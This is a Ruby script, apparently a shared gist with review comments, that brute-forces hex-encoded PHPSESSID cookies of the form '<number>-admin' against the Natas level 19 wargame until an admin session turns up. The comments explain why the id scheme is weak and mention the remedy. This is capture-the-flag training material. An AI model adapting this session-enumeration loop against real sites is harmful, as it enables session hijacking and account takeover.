Script to brute force session id for Natas CTF Level 19
| # Script to brute force session id for Natas CTF Level 19 | |
| # http://natas19.natas.labs.overthewire.org/ | |
| require 'net/http' | |
# Walks candidate PHPSESSID values for the Natas level 19 wargame and prints
# the response that contains "You are an admin.".
#
# What the exercise demonstrates: the candidate session id is just
# "<small integer>-<username>" run through hex encoding. Hex is an encoding,
# not a secret, so the whole id space tried here (0..960) can be enumerated
# with fewer than a thousand requests.
# NOTE(review): the usual remedy is long session ids from a CSPRNG plus
# rate limiting on failed lookups; confirm against the level's write-up.
#
# Reads the level password from ENV['NATAS19_PASSWORD'].
# NOTE(review): the target URI is plain http://, so the basic-auth
# credentials and the session cookie cross the network unencrypted.
#
# @raise [ArgumentError] when NATAS19_PASSWORD is not set
# @return [nil] output goes to stdout via puts
def find_password
  level_password = ENV['NATAS19_PASSWORD']
  raise ArgumentError, "Password required." unless level_password

  admin_body = ""
  seen_bodies = []
  max_id = 640
  # The original author scans 1.5x the assumed maximum id (0..960).
  last_candidate = max_id * 3 / 2

  0.upto(last_candidate) do |session_number|
    target = URI("http://natas19.natas.labs.overthewire.org/")
    target.query = URI.encode_www_form({ "debug" => true })

    request = Net::HTTP::Get.new(target)
    request.basic_auth 'natas19', level_password

    # Session id layout used by this script: "<number>-admin", hex-encoded.
    plain_id = "#{session_number}-admin"
    encoded_id = bin_to_hex(plain_id)
    cookie_header = "PHPSESSID=#{encoded_id}"
    puts "Trying cookie #{cookie_header} (#{plain_id})"
    request['Cookie'] = cookie_header

    # A fresh connection is opened for every candidate, as in the original.
    response = Net::HTTP.start(target.hostname, target.port) do |http|
      http.request(request)
    end

    # Every body is kept and dumped at the end, matching or not.
    seen_bodies << response.body
    next unless response.body.include?("You are an admin.")

    admin_body = response.body
    break
  end

  puts seen_bodies
  puts admin_body
end
| # http://anthonylewis.com/2011/02/09/to-hex-and-back-with-ruby/ | |
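# Hex-encodes a string byte by byte, always emitting two lowercase hex digits
# per byte.
#
# The previous form used Integer#to_s(16), which drops the leading zero for
# bytes below 0x10 ("\n" became "a" instead of "0a"). That output is
# ambiguous and cannot be decoded back. Printable ASCII input encodes
# exactly as before.
#
# @param s [String] the bytes to encode
# @return [String] lowercase hex, twice as long as s in bytes
def bin_to_hex(s)
  s.unpack('H*').first
end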